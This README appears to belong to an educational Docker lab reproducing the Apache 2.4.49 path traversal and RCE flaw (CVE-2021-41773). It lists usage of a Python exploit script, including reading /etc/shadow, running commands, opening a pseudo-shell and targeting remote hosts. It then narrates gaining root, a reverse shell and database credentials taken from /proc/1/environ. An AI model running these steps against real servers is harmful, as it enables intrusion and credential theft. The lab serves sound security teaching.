
Docker-based lab for Apache CVE-2021-41773 path traversal and RCE exploitation with Python exploit script, demonstrating vulnerability analysis and mitigation strategies.
This repository reproduces a publicly disclosed and patched vulnerability in a controlled Docker lab environment for educational and research purposes.
The environment is intentionally vulnerable and must only be deployed in isolated test environments. Do not attempt to exploit systems without explicit authorization.
The goal of this project is to demonstrate vulnerability analysis, exploitation, and mitigation strategies.
Path Traversal & Remote Code Execution
# Navigate to the project folder
cd Apache-CVE-2021-41773
# Validate compose syntax
docker compose config
# Start the lab
docker compose up -d --build
# Check that everything is running
docker compose ps
Apache 2.4.49 introduced a bug in URL path normalization. Encoded sequences like .%2e (equivalent to ..) are not properly sanitized, allowing an attacker to traverse the directory tree beyond the DocumentRoot.
If mod_cgi is enabled and the root directory (/) is configured with Require all granted, an attacker can:
/bin/sh interpreter (RCE)exploit.py)No external dependencies — uses only Python standard library.
Auto python exploit.py Check vuln + run id as demo
Read file python exploit.py -f /etc/shadow Read any file via RCE
RCE python exploit.py -c "whoami" Execute a single command
Shell python exploit.py -i Interactive pseudo-shell
Custom target python exploit.py -u http://target:8888 Target a remote host
Firsly, we verfiy that the envrionnement is vulnerable
As expected, the command return the id uid=0(root) gid=0(root) groups=0(root)
Let's create a reverse shell :
We are logged as root
As you can see, there is a missconfiguration on /proc/1/environ we got the SQL password This reveals exposed secrets caused by insecure container configuration
Using the extracted credentials, we connect to the MySQL database, and print the stored data

Never reproduce these configurations in a production environment.